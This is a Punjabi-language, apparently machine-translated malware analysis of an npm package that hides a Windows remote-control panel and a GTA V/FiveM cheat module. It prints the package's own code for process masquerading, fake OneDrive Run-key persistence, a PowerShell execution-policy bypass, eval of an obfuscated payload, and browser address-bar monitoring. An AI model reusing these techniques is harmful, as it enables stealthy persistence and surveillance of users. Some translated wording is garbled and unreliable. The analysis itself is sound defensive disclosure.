ਪੇਅਰਲੂਪ: npm ਪੈਕੇਜ ਵਿੱਚ ਲੁਕਿਆ ਹੋਇਆ ਰਿਮੋਟ-ਕੰਟਰੋਲ ਪੈਨਲ

ਪੇਅਰਲੂਪ: ਇੱਕ ਐਨਪੀਐਮ ਪੈਕੇਜ, ਸੱਤਰ ਸੰਸਕਰਣ, ਅਤੇ ਇੱਕ ਲੁਕਿਆ ਹੋਇਆ ਵਿੰਡੋਜ਼ ਰਿਮੋਟ-ਕੰਟਰੋਲ ਪੈਨਲ

ਵਿਸ਼ਾ - ਸੂਚੀ

ਪੜ੍ਹਨਯੋਗ ਪੋਸਟਾਂ

ਦਿਲਚਸਪੀ ਵਾਲੀਆਂ ਨਵੀਨਤਮ ਪੋਸਟਾਂ

TL; ਡਾ

ਐਨਪੀਐਮ ਪੈਕੇਜ ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਇਹ ਆਪਣੇ ਆਪ ਨੂੰ "ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਕੰਟਰੋਲ ਪੈਨਲ" ਵਜੋਂ ਦਰਸਾਉਂਦਾ ਹੈ। ਵਿੰਡੋਜ਼ 'ਤੇ ਇਹ ਇੱਕ ਰਿਮੋਟ-ਕੰਟਰੋਲ ਅਤੇ ਨਿਗਰਾਨੀ ਟੂਲ ਵਜੋਂ ਕੰਮ ਕਰਦਾ ਹੈ।

ਇਸਦਾ ਪ੍ਰਵੇਸ਼ ਬਿੰਦੂ, launcher.js, ਆਪਣੀ ਪ੍ਰਕਿਰਿਆ ਦਾ ਨਾਮ ਬਦਲ ਕੇ ਰਨਟਾਈਮ ਬ੍ਰੋਕਰ ਰੱਖਦਾ ਹੈ, ਇੱਕ ਆਟੋਸਟਾਰਟ ਰਨ-ਕੁੰਜੀ ਮੁੱਲ ਲਿਖਦਾ ਹੈ ਜਿਸਦਾ ਨਾਮ ਹੈ OneDriveUpdate ਜੋ ਕਿ ਇੱਕ ਲੁਕਵੇਂ VBScript ਰਾਹੀਂ ਪੈਕੇਜ ਨੂੰ ਦੁਬਾਰਾ ਲਾਂਚ ਕਰਦਾ ਹੈ, PowerShell ਨੂੰ ਇਸ ਨਾਲ ਪੈਦਾ ਕਰਦਾ ਹੈ -ExecutionPolicy Bypass, ਅਤੇ ਫਿਰ ਇੱਕ 6.87 MB ਮੂਲ ਮੋਡੀਊਲ ਦੇ ਨਾਲ ਇੱਕ 171 KB ਗੁੰਝਲਦਾਰ ਸਰਵਰ ਪੇਲੋਡ ਦੀ ਤੁਲਨਾ ਕਰਦਾ ਹੈ, sens.node.

ਇਹ TCP ਪੋਰਟ 3000 'ਤੇ ਇੱਕ ਫ਼ੋਨ-ਪੇਅਰਿੰਗ ਕੰਟਰੋਲ ਪੈਨਲ ਦੀ ਸੇਵਾ ਕਰਦਾ ਹੈ ਅਤੇ Windows UIAutomation ਰਾਹੀਂ ਸਰਗਰਮ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਐਡਰੈੱਸ-ਬਾਰ URL ਨੂੰ ਪੜ੍ਹਦਾ ਹੈ, ਇੱਕ ਹਾਰਡ-ਕੋਡ ਕੀਤੇ YouTube ਵੀਡੀਓ ਨੂੰ ਦੇਖਦਾ ਹੈ।

ਦੋ ਹਿੱਸੇ ਜੋ ਪਹਿਲਾਂ ਬਲੈਕ ਬਾਕਸ ਵਜੋਂ ਪੜ੍ਹੇ ਜਾਂਦੇ ਸਨ ਹੁਣ ਹੱਲ ਹੋ ਗਏ ਹਨ। ਅਸਪਸ਼ਟ ਸਰਵਰ, server.obf.js, ਇੱਕ obfuscator.io RC4 string-array ਸਕੀਮ ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹੈ; ਇਸਦੇ ਡੀਕੋਡਰ ਨੂੰ ਔਫਲਾਈਨ ਦੁਬਾਰਾ ਲਾਗੂ ਕਰਨ ਨਾਲ (ਕੋਈ JavaScript ਐਗਜ਼ੀਕਿਊਟ ਨਹੀਂ ਕੀਤਾ ਗਿਆ) ਇੱਕ ਸਿੰਗਲ ਬਾਹਰੀ ਐਂਡਪੁਆਇੰਟ ਨੂੰ ਰਿਕਵਰ ਕਰਦਾ ਹੈ — https://izopi.com/check.php — ਦਸਤਖਤ ਕੀਤੇ ਲਾਇਸੈਂਸ ਜਵਾਬਾਂ ਦੀ ਪੁਸ਼ਟੀ ਕਰਨ ਲਈ ਵਰਤੀ ਜਾਂਦੀ ਇੱਕ ਏਮਬੈਡਡ RSA ਪਬਲਿਕ ਕੁੰਜੀ ਦੇ ਨਾਲ।

ਮੂਲ ਮੋਡੀਊਲ, sens.node, ਪੈਕ ਨਹੀਂ ਕੀਤਾ ਗਿਆ ਹੈ: ਇਸਦੀ ਆਯਾਤ ਸਾਰਣੀ ਅਤੇ ਏਮਬੈਡਡ ਸਟ੍ਰਿੰਗ ਇਸਨੂੰ DirectX 11 / Dear ImGui ਇਨ-ਗੇਮ ਓਵਰਲੇਅ ਵਜੋਂ ਪਛਾਣਦੇ ਹਨ ਜੋ ਏਮਬੋਟ, ESP (ਵਾਲ-ਹੈਕ), ਅਤੇ ਟ੍ਰਿਗਰਬੋਟ ਵਿਸ਼ੇਸ਼ਤਾਵਾਂ ਪ੍ਰਦਾਨ ਕਰਦੇ ਹਨ, ਜੋ ਰਿਮੋਟ-ਪ੍ਰੋਸੈਸ ਇੰਜੈਕਸ਼ਨ ਅਤੇ ਮੈਮੋਰੀ ਰੀਡ/ਰਾਈਟ ਦੁਆਰਾ ਸੰਚਾਲਿਤ ਹਨ।

ਇਸਦੇ ਅੰਦਰਲੇ ਸਟ੍ਰਿੰਗ ਵਾਹਨ ਇਕਾਈਆਂ ਅਤੇ ਨਕਸ਼ੇ ਦੇ ਸਥਾਨਾਂ ਦਾ ਹਵਾਲਾ ਦਿੰਦੇ ਹਨ ਜੋ GTA V / FiveM ਦੇ ਅਨੁਕੂਲ ਹਨ। npm ਪੈਕੇਜ ਉਸ ਮੂਲ ਮੋਡੀਊਲ ਦੇ ਆਲੇ-ਦੁਆਲੇ ਡਿਲੀਵਰੀ ਅਤੇ ਸਥਿਰਤਾ ਰੈਪਰ ਹੈ।

ਪਰਿਭਾਸ਼ਿਤ ਸਿਗਨਲ ਕਾਰਜਸ਼ੀਲ ਹੈ, ਤਕਨੀਕੀ ਨਹੀਂ: ਇੱਕ ਗੁਮਨਾਮ ਪ੍ਰਕਾਸ਼ਕ ਨੇ ਇੱਕ ਪੈਕੇਜ ਦੇ ਲਗਭਗ ਸੱਤਰ ਸੰਸਕਰਣਾਂ ਨੂੰ ਅੱਗੇ ਵਧਾਇਆ - 2.5.0 ਤੋਂ 2.5.69 ਤੱਕ — ਕੁਝ ਦਿਨਾਂ ਤੱਕ, ਹਰੇਕ ਕੋਲ ਇੱਕੋ ਲਾਂਚਰ ਸੀ।

ਕੋਈ ਇੰਸਟਾਲੇਸ਼ਨ ਨਹੀਂ ਹੈ hooks. ਪੇਲੋਡ ਸਿਰਫ਼ ਉਦੋਂ ਹੀ ਚੱਲਦਾ ਹੈ ਜਦੋਂ ਪੈਕੇਜ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ।

ਹਮਲਾ: ਇਹ ਕਿਵੇਂ ਕੰਮ ਕਰਦਾ ਹੈ

ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਦਸ ਫਾਈਲਾਂ ਭੇਜਦੀ ਹੈ। package.json ਸਪਾਰਸ ਹੈ: ਕੋਈ ਰਿਪੋਜ਼ਟਰੀ ਫੀਲਡ ਨਹੀਂ, ਕੋਈ ਲਾਇਸੈਂਸ ਨਹੀਂ, ਇੱਕ ਮੁੱਖ ਅਤੇ ਦੋ ਬਿਨ ਉਪਨਾਮ (ਸੰਵੇਦਨਸ਼ੀਲਤਾ, ਸੈਂਸ) ਸਾਰੇ launcher.js ਵੱਲ ਇਸ਼ਾਰਾ ਕਰਦੇ ਹਨ, ਅਤੇ ਨੋਡ launcher.js ਦੀ ਇੱਕ ਸ਼ੁਰੂਆਤੀ ਸਕ੍ਰਿਪਟ। ਕੋਈ ਪੋਸਟਇੰਸਟਾਲ ਜਾਂ ਪ੍ਰੀਇੰਸਟਾਲ ਨਹੀਂ ਹੈ। npm ਇੰਸਟਾਲ 'ਤੇ ਕੁਝ ਵੀ ਚਾਲੂ ਨਹੀਂ ਹੁੰਦਾ। ਹੇਠਾਂ ਦੱਸਿਆ ਗਿਆ ਵਿਵਹਾਰ ਉਦੋਂ ਚੱਲਦਾ ਹੈ ਜਦੋਂ ਇੱਕ ਉਪਭੋਗਤਾ ਪੈਕੇਜ ਸ਼ੁਰੂ ਕਰਦਾ ਹੈ — bin shim, start ਸਕ੍ਰਿਪਟ, ਜਾਂ ਇੱਕ require ਰਾਹੀਂ।

ਟਾਰਬਾਲ ਵਿੱਚ ਲਾਂਚਰ, ਇੱਕ ਅਸਪਸ਼ਟ ਸਰਵਰ, ਨੇਟਿਵ ਮੋਡੀਊਲ, ਇੱਕ ਵਿਜ਼ੂਅਲ ਬੇਸਿਕ ਸਕ੍ਰਿਪਟ, ਅਤੇ ਕੰਟਰੋਲ ਪੈਨਲ ਲਈ ਇੱਕ ਜਨਤਕ/ਵੈੱਬ ਡਾਇਰੈਕਟਰੀ ਹੁੰਦੀ ਹੈ। launcher.js ਪੜ੍ਹਨਯੋਗ ਆਰਕੈਸਟ੍ਰੇਟਰ ਹੈ; ਰਨਟਾਈਮ 'ਤੇ ਮਾਇਨੇ ਰੱਖਣ ਵਾਲਾ ਤਰਕ ਦੋ ਬਲੌਬਾਂ ਵਿੱਚ ਰਹਿੰਦਾ ਹੈ ਜੋ ਇਹ ਲੋਡ ਕਰਦਾ ਹੈ - ਇੱਕ ਅਸਪਸ਼ਟ ਸਰਵਰ ਅਤੇ ਇੱਕ ਕੰਪਾਇਲ ਕੀਤਾ ਨੇਟਿਵ ਮੋਡੀਊਲ, ਦੋਵੇਂ ਹੇਠਾਂ ਹੱਲ ਕੀਤੇ ਗਏ ਹਨ।

 ਪ੍ਰੋਸੈਸ ਮਾਸਕਰੇਡ ਅਤੇ ਇੱਕ ਨਕਲੀ OneDrive ਅੱਪਡੇਟਰ

ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦੇ ਸ਼ੁਰੂ ਵਿੱਚ launcher.js ਆਪਣਾ ਪ੍ਰੋਸੈਸ ਨਾਮ ਦੋ ਵਾਰ ਸੈੱਟ ਕਰਦਾ ਹੈ:

   javascript process.title = 'Runtime Broker'; 

ਰਨਟਾਈਮ ਬ੍ਰੋਕਰ ਇੱਕ ਜਾਇਜ਼ ਵਿੰਡੋਜ਼ ਪ੍ਰਕਿਰਿਆ (RuntimeBroker.exe) ਹੈ ਜੋ ਐਪ ਅਨੁਮਤੀਆਂ ਦੀ ਵਿਚੋਲਗੀ ਕਰਦੀ ਹੈ। ਇੱਕ ਨੋਡ ਪ੍ਰਕਿਰਿਆ ਦਾ ਨਾਮ ਬਦਲਣ ਨਾਲ ਇਸ ਨਾਲ ਮੇਲ ਖਾਂਦਾ ਹੈ, ਇਸਦਾ ਮਤਲਬ ਹੈ ਕਿ ਟਾਸਕ ਮੈਨੇਜਰ 'ਤੇ ਇੱਕ ਝਾਤ ਮਾਰਨ ਨਾਲ ਕੁਝ ਵੀ ਅਸਾਧਾਰਨ ਨਹੀਂ ਦਿਖਾਈ ਦਿੰਦਾ।

ਪਰਸਿਸਟੈਂਸ ਸਿੱਧੇ ਰਜਿਸਟਰੀ API ਦੀ ਬਜਾਏ ਪਾਵਰਸ਼ੈਲ ਰਾਹੀਂ ਲਿਖੀ ਜਾਂਦੀ ਹੈ:

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

ਆਟੋਸਟਾਰਟ ਮੁੱਲ ਨੂੰ OneDriveUpdate ਨਾਮ ਦਿੱਤਾ ਗਿਆ ਹੈ, ਅਤੇ ਇਹ ਸਿੱਧੇ ਪੈਕੇਜ ਵੱਲ ਇਸ਼ਾਰਾ ਨਹੀਂ ਕਰਦਾ। ਇਹ ਬੰਡਲ ਕੀਤੇ OneDrive.Standalone.Updater.vbs ਨੂੰ ਚਲਾਉਣ ਵਾਲੇ wscript.exe ਵੱਲ ਇਸ਼ਾਰਾ ਕਰਦਾ ਹੈ। ਉਹ ਸਕ੍ਰਿਪਟ ਇੱਕ ਲੁਕਵੀਂ ਵਿੰਡੋ ਵਿੱਚ ਨੋਡ launcher.js ਨੂੰ ਦੁਬਾਰਾ ਲਾਂਚ ਕਰਦੀ ਹੈ। Run-key ਨਾਮ ਅਤੇ VBScript ਫਾਈਲ ਨਾਮ ਦੋਵੇਂ Microsoft ਬ੍ਰਾਂਡਿੰਗ ਉਧਾਰ ਲੈਂਦੇ ਹਨ, ਇਸ ਲਈ ਆਟੋਸਟਾਰਟ ਐਂਟਰੀ ਨੂੰ ਇੱਕ ਰੁਟੀਨ OneDrive ਕਾਰਜ ਵਜੋਂ ਪੜ੍ਹਿਆ ਜਾਂਦਾ ਹੈ।

ਐਗਜ਼ੀਕਿਊਸ਼ਨ-ਪਾਲਿਸੀ ਬਾਈਪਾਸ ਦੇ ਨਾਲ ਪਾਵਰਸ਼ੈਲ

ਲਾਂਚਰ ਵਾਰ-ਵਾਰ ਪਾਵਰਸ਼ੈਲ ਵੱਲ ਜਾਂਦਾ ਹੈ। ਜਿਸ ਸਿੰਕ ਨੂੰ ਸਕੈਨਰ ਮਹੱਤਵਪੂਰਨ ਵਜੋਂ ਫਲੈਗ ਕਰਦੇ ਹਨ ਉਹ ਇੱਕ ਜਨਰੇਟ ਕੀਤੇ .ps1 ਨੂੰ ਲਾਂਚ ਕਰਨਾ ਹੈ ਜਿਸ ਵਿੱਚ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਨੀਤੀ ਅਯੋਗ ਹੈ:

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਪਾਲਿਸੀ ਬਾਈਪਾਸ ਉਸ ਇਨਵੋਕੇਸ਼ਨ ਲਈ ਸਥਾਨਕ ਸਕ੍ਰਿਪਟ-ਸਾਈਨਿੰਗ ਚੈੱਕ ਨੂੰ ਹਟਾ ਦਿੰਦਾ ਹੈ। ਤਿਆਰ ਕੀਤੀਆਂ ਸਕ੍ਰਿਪਟਾਂ ਅਗਲੇ ਭਾਗ ਵਿੱਚ ਦੱਸੇ ਗਏ ਬ੍ਰਾਊਜ਼ਰ-ਨਿਗਰਾਨੀ ਅਤੇ ਵਿੰਡੋ-ਡਿਟੈਕਸ਼ਨ ਕੰਮ ਨੂੰ ਸੰਭਾਲਦੀਆਂ ਹਨ।

ਅਸਪਸ਼ਟ ਸਰਵਰ ਅਤੇ ਮੂਲ ਮੋਡੀਊਲ

ਸੈੱਟਅੱਪ ਤੋਂ ਬਾਅਦ, launcher.js ਆਪਣੇ ਅਸਲ ਪੇਲੋਡ ਨੂੰ ਲੋਡ ਅਤੇ ਚਲਾਉਂਦਾ ਹੈ:

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js _0x-ਐਰੇ ਔਬਫਸਕੇਸ਼ਨ ਦਾ 171 KB ਹੈ — ਜਾਵਾ ਸਕ੍ਰਿਪਟ ਪੈਟਰਨ ਜਿੱਥੇ ਹਰੇਕ ਸਟ੍ਰਿੰਗ ਅਤੇ ਪਛਾਣਕਰਤਾ ਨੂੰ ਇੱਕ ਇੰਡੈਕਸ ਦੁਆਰਾ ਇੱਕ ਸ਼ਫਲਡ ਐਰੇ ਵਿੱਚ ਬਦਲਿਆ ਜਾਂਦਾ ਹੈ, ਫਿਰ ਰਨਟਾਈਮ 'ਤੇ ਡੀ-ਰੈਫਰੈਂਸ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਇਹ ਸਕੀਮ obfuscator.io ਦੁਆਰਾ ਤਿਆਰ ਕੀਤਾ ਗਿਆ RC4 ਰੂਪ ਹੈ: ਇੱਕ ਸਿੰਗਲ ਡੀਕੋਡਰ ਫੰਕਸ਼ਨ base64-ਇੱਕ ਐਰੇ ਐਂਟਰੀ ਨੂੰ ਡੀਕੋਡ ਕਰਦਾ ਹੈ ਅਤੇ ਫਿਰ RC4-ਇਸਨੂੰ ਪ੍ਰਤੀ-ਕਾਲ ਕੁੰਜੀ ਨਾਲ ਡੀਕ੍ਰਿਪਟ ਕਰਦਾ ਹੈ। ਉਸ ਡੀਕੋਡਰ ਨੂੰ ਇੱਕ ਵੱਖਰੀ ਸਕ੍ਰਿਪਟ ਵਿੱਚ ਦੁਬਾਰਾ ਲਾਗੂ ਕਰਨਾ — ਐਕਸਟਰੈਕਟ ਕੀਤੇ 821-ਐਂਟਰੀ ਸਟ੍ਰਿੰਗ ਐਰੇ ਉੱਤੇ ਸਿਰਫ਼ ਰੀ-ਇੰਪਲੀਮੈਂਟੇਸ਼ਨ ਚਲਾਉਣਾ, ਕਦੇ ਵੀ ਪੈਕੇਜ ਦਾ ਆਪਣਾ ਜਾਵਾ ਸਕ੍ਰਿਪਟ ਨਹੀਂ — ਇਸਨੂੰ ਸਾਫ਼-ਸੁਥਰਾ ਨਹੀਂ ਖੋਲ੍ਹਦਾ। ਕਿਹੜੀਆਂ ਸਤਹਾਂ ਮਾਮੂਲੀ ਹਨ ਪਰ ਡੀcisive: ਇੱਕ ਬਾਹਰੀ URL, https://izopi.com/check.php`, ਇੱਕ LICENSE_URL ਸਥਿਰ ਨੂੰ ਨਿਰਧਾਰਤ ਕੀਤਾ ਗਿਆ ਹੈ; ਇੱਕ ਏਮਬੈਡਡ RSA PUBLIC_KEY_PEM`; ਸਥਾਨਕ ਪੈਨਲ ਰੂਟ /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, ਅਤੇ /trigger/status; ਅਤੇ child_process, crypto, ਅਤੇ [Sensivity] sens.node ਲੋਡ ਕੀਤੇ ਗਏ ਸਤਰ - ਆਖਰੀ ਸਹੀ ਲੌਗ ਲਾਈਨ ਹੈ ਜੋ ਲਾਂਚਰ ਲੋਡ ਕੀਤੇ ਪ੍ਰੋਗਰਾਮ ਮੋਡੀਊਲ ਤੇ ਦੁਬਾਰਾ ਲਿਖਦਾ ਹੈ। ਅੰਤਮ ਬਿੰਦੂ ਇੱਕ ਲਾਇਸੈਂਸ ਜਾਂਚ ਹੈ: ਕਲਾਇੰਟ ਇੱਕ ਪਛਾਣਕਰਤਾ ਪੋਸਟ ਕਰਦਾ ਹੈ (ਅਸਪਸ਼ਟ ਸਰਵਰ ਇੱਕ ਡਿਸਕਾਰਡ ID ਨੂੰ ਫਾਰਮੈਟ ਕਰਦਾ ਹੈ: %s ਸਟ੍ਰਿੰਗ) ਅਤੇ RSA ਕੁੰਜੀ ਸਰਵਰ ਦੇ ਦਸਤਖਤ ਕੀਤੇ ਜਵਾਬ ਦੀ ਪੁਸ਼ਟੀ ਕਰਦੀ ਹੈ।

sens.node ਇੱਕ 6.87 MB ਕੰਪਾਇਲ ਕੀਤਾ ਨੇਟਿਵ ਐਡਆਨ ਹੈ, ਅਤੇ ਇਹ ਪੈਕ ਨਹੀਂ ਕੀਤਾ ਗਿਆ ਹੈ — ਸੈਕਸ਼ਨ ਐਂਟਰੋਪੀ 5.6–6.6 'ਤੇ ਬੈਠਦਾ ਹੈ ਅਤੇ PE ਆਯਾਤ ਅਤੇ ਨਿਰਯਾਤ ਟੇਬਲ ਬਰਕਰਾਰ ਹਨ, ਇਸ ਲਈ ਇਸਦੀਆਂ ਸਮਰੱਥਾਵਾਂ ਸਿੱਧੇ ਪੜ੍ਹਨਯੋਗ ਹਨ। ਇਹ napi_register_module_v1 ਨੂੰ ਨਿਰਯਾਤ ਕਰਦਾ ਹੈ, standard ਨੋਡ N-API ਐਂਟਰੀ ਪੁਆਇੰਟ, ਇਸ ਲਈ eval'd ਸਰਵਰ ਇਸਨੂੰ ਇੱਕ ਪਲੇਨ ਲੋੜ ਨਾਲ ਲੋਡ ਕਰਦਾ ਹੈ। ਇਸਦੀ ਇੰਪੋਰਟ ਟੇਬਲ ਦੱਸਦੀ ਹੈ। KERNEL32 ਤੋਂ ਇਹ OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, ਅਤੇ Process32First/NextW ਨੂੰ ਖਿੱਚਦਾ ਹੈ — ਇੱਕ ਹੋਰ ਪ੍ਰਕਿਰਿਆ ਦਾ ਪਤਾ ਲਗਾਉਣ, ਇਸਦੇ ਅੰਦਰ ਮੈਮੋਰੀ ਨਿਰਧਾਰਤ ਕਰਨ, ਅਤੇ ਉਸ ਮੈਮੋਰੀ ਨੂੰ ਪੜ੍ਹਨ ਜਾਂ ਲਿਖਣ ਲਈ ਕੈਨੋਨੀਕਲ ਸੈੱਟ। USER32 ਤੋਂ ਇਹ GetAsyncKeyState, GetKeyState, mouse_event, ਅਤੇ SetCursorPos ਨੂੰ ਖਿੱਚਦਾ ਹੈ; ਇਹ d3d11.dll, D3DCOMPILER_43, ਅਤੇ dwmapi ਨੂੰ ਇੱਕ ਔਨ-ਸਕ੍ਰੀਨ ਓਵਰਲੇਅ ਲਈ, ਅਤੇ ਨੈੱਟਵਰਕ ਕਾਲਾਂ ਲਈ ਪੂਰਾ WINHTTP ਸੈੱਟ ਲਿੰਕ ਕਰਦਾ ਹੈ। ਇਸ ਦੀਆਂ ਏਮਬੈਡਡ ਸਟ੍ਰਿੰਗਾਂ ਬਿਨਾਂ ਕਿਸੇ ਅਸਪਸ਼ਟਤਾ ਦੇ ਵਿਸ਼ੇਸ਼ਤਾ ਸੈੱਟ ਦਾ ਨਾਮ ਦਿੰਦੀਆਂ ਹਨ: ਏਮਬੋਟ ਨੂੰ ਸਮਰੱਥ ਬਣਾਓ, ਏਮਬੋਟ FOV, ਬਾਕਸ ESP, ਸਕੈਲਟਨ ESP, ਟ੍ਰਿਗਰਬੋਟ, ESP ਬਿਲਡਰ, ਵਾਹਨ ESP, ਇਲੈਕਟ੍ਰੌਨ ਐਂਟੀਚੀਟ ਖੋਜਿਆ ਗਿਆ, ਅਤੇ ਪਿਆਰਾ ImGui ਬੈਨਰ ਪਿਆਰਾ ImGui 1.91.3 WIP। ਸਥਾਨ ਅਤੇ ਇਕਾਈ ਸਟ੍ਰਿੰਗਾਂ ਜਿਵੇਂ ਕਿ Grapeseed Medical Clinic ਅਤੇ ਵਾਹਨ-ESP ਸ਼ਬਦਾਵਲੀ GTA V / FiveM ਨਾਲ ਇਕਸਾਰ ਹਨ।

ਇਹ ਵੰਡ ਜਾਣਬੁੱਝ ਕੇ ਕੀਤੀ ਗਈ ਹੈ: ਪੜ੍ਹਨਯੋਗ launcher.js ਸਿਰਫ਼ ਉਹਨਾਂ ਹਿੱਸਿਆਂ ਨੂੰ ਰੱਖਦਾ ਹੈ ਜੋ ਸਕੈਨਰ ਆਸਾਨੀ ਨਾਲ ਪੜ੍ਹਦਾ ਹੈ — ਸਥਿਰਤਾ, ਮਾਸਕਰੇਡ, ਈਵਲ ਕਾਲ ਖੁਦ — ਜਦੋਂ ਕਿ ਔਬਫਸਕੇਸ਼ਨ ਇੱਕ ਬਾਹਰੀ ਹੋਸਟ ਨੂੰ ਰਨਟਾਈਮ ਸੰਪਰਕਾਂ ਵਿੱਚ ਲੁਕਾਉਂਦਾ ਹੈ, ਅਤੇ ਬਾਈਨਰੀ ਗੇਮ-ਓਵਰਲੇ ਅਤੇ ਪ੍ਰਕਿਰਿਆ-ਇੰਜੈਕਸ਼ਨ ਤਰਕ ਨੂੰ ਰੱਖਦਾ ਹੈ। ਲਾਂਚਰ ਪਤਲਾ, ਆਡੀਟੇਬਲ ਸ਼ੈੱਲ ਹੈ; ਔਬਫਸਕੇਟਡ ਸਰਵਰ ਨੈੱਟਵਰਕ ਪਛਾਣ ਨੂੰ ਲੁਕਾਉਂਦਾ ਹੈ; ਮੂਲ ਮੋਡੀਊਲ ਪੇਲੋਡ ਹੈ। ਅਸੀਂ ਬਾਈਨਰੀ ਦੇ ਆਯਾਤ ਅਤੇ ਸਟ੍ਰਿੰਗਾਂ ਨੂੰ ਪੜ੍ਹੇ ਹੋਏ ਵਜੋਂ ਦਰਸਾਉਂਦੇ ਹਾਂ; ਅਸੀਂ ਉਹਨਾਂ ਤੋਂ ਆਪਰੇਟਰ ਦੇ ਉਦੇਸ਼ ਦਾ ਅਨੁਮਾਨ ਨਹੀਂ ਲਗਾਉਂਦੇ।

 ਪੋਰਟ 3000 'ਤੇ ਫ਼ੋਨ-ਜੋੜਾ ਬਣਾਉਣ ਵਾਲਾ ਕੰਟਰੋਲ ਪੈਨਲ

ਲਾਂਚਰ TCP ਪੋਰਟ 3000 'ਤੇ ਇੱਕ ਸਥਾਨਕ ਵੈੱਬ ਸਰਵਰ ਦਾ ਪ੍ਰਬੰਧਨ ਕਰਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ ਇੱਕ ਸਿੰਗਲਟਨ ਵਜੋਂ ਮੰਨਦਾ ਹੈ। ਇਹ ਇੱਕ ਮੌਜੂਦਾ ਲਿਸਨਰ ਲਈ ਪੁੱਛਗਿੱਛ ਕਰਦਾ ਹੈ ਅਤੇ ਬਾਈਡਿੰਗ ਤੋਂ ਪਹਿਲਾਂ ਇਸਨੂੰ ਸਾਫ਼ ਕਰਦਾ ਹੈ:

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

ਪੈਨਲ http://localhost:3000 'ਤੇ ਪਹੁੰਚਯੋਗ ਹੈ, ਜਿਸ ਵਿੱਚ http://192.168.1.16:3000 ਦਾ ਹਾਰਡ-ਕੋਡਿਡ LAN ਫਾਲਬੈਕ URL ਹੈ। ਪਬਲਿਕ/ ਡਾਇਰੈਕਟਰੀ ਅਤੇ ਪੈਨਲ ਦਾ ਵਿਵਹਾਰ ਇੱਕ QR-ਪੇਅਰਿੰਗ ਫਲੋ ਦੇ ਅਨੁਕੂਲ ਹੈ: ਇੱਕ ਫੋਨ ਇੱਕ ਕੋਡ ਨੂੰ ਸਕੈਨ ਕਰਦਾ ਹੈ ਅਤੇ ਰਿਮੋਟ ਦੇ ਤੌਰ 'ਤੇ ਹੋਸਟ ਨਾਲ ਜੁੜਦਾ ਹੈ। ਲਾਂਚਰ ਵਿੱਚ ਕੋਈ ਬਾਹਰੀ ਕਮਾਂਡ-ਐਂਡ-ਕੰਟਰੋਲ ਡੋਮੇਨ ਸਪੱਸ਼ਟ ਟੈਕਸਟ ਵਿੱਚ ਦਿਖਾਈ ਨਹੀਂ ਦਿੰਦਾ ਹੈ — ਪਰ, ਜਿਵੇਂ ਕਿ ਉੱਪਰ ਡੀਓਬਫਸਕੇਸ਼ਨ ਦਿਖਾਉਂਦਾ ਹੈ, ਇੱਕ ਅਸਪਸ਼ਟ ਸਰਵਰ ਵਿੱਚ ਮੌਜੂਦ ਹੈ: izopi.com ਲਾਇਸੈਂਸ ਐਂਡਪੁਆਇੰਟ। ਪੈਨਲ ਖੁਦ ਸਥਾਨਕ ਅਤੇ LAN-ਸਕੋਪਡ ਹੈ; ਇੱਕੋ ਇੱਕ ਆਊਟਬਾਉਂਡ ਹੋਸਟ ਉਹ ਲਾਇਸੈਂਸ ਚੈੱਕ ਹੈ।

ਇੱਕ ਡਿਟੈਚਡ ਸੁਪਰਵਾਈਜ਼ਰ/ਵਰਕਰ ਮਾਡਲ ਪ੍ਰਕਿਰਿਆ ਨੂੰ ਜ਼ਿੰਦਾ ਰੱਖਦਾ ਹੈ। ਲਾਂਚਰ SENSIVITY_SUPERVISOR ਅਤੇ SENSIVITY_WORKER ਵਾਤਾਵਰਣ ਝੰਡਿਆਂ ਨਾਲ ਆਪਣੇ ਆਪ ਨੂੰ ਦੁਬਾਰਾ ਪੈਦਾ ਕਰਦਾ ਹੈ, ਹਰੇਕ ਚਾਈਲਡ ਲੁਕਿਆ ਹੋਇਆ ਚੱਲਦਾ ਹੈ, ਇਸ ਲਈ ਇੱਕ ਪ੍ਰਕਿਰਿਆ ਨੂੰ ਖਤਮ ਕਰਨ ਨਾਲ ਇਸਨੂੰ ਮੁੜ ਚਾਲੂ ਕਰਨ ਲਈ ਇੱਕ ਵਾਚਡੌਗ ਛੱਡ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ।

ਬ੍ਰਾਊਜ਼ਰ ਨਿਗਰਾਨੀ ਅਤੇ YouTube ਸਿਗਨਲ

ਸਭ ਤੋਂ ਖਾਸ ਵਿਵਹਾਰ ਬ੍ਰਾਊਜ਼ਰ ਨਿਗਰਾਨੀ ਹੈ। launcher.js PowerShell ਬਣਾਉਂਦਾ ਹੈ ਜੋ Windows UIAutomation ਨੂੰ ਚੱਲ ਰਹੇ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਐਡਰੈੱਸ ਬਾਰ ਨੂੰ ਪੜ੍ਹਨ ਲਈ ਚਲਾਉਂਦਾ ਹੈ:

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

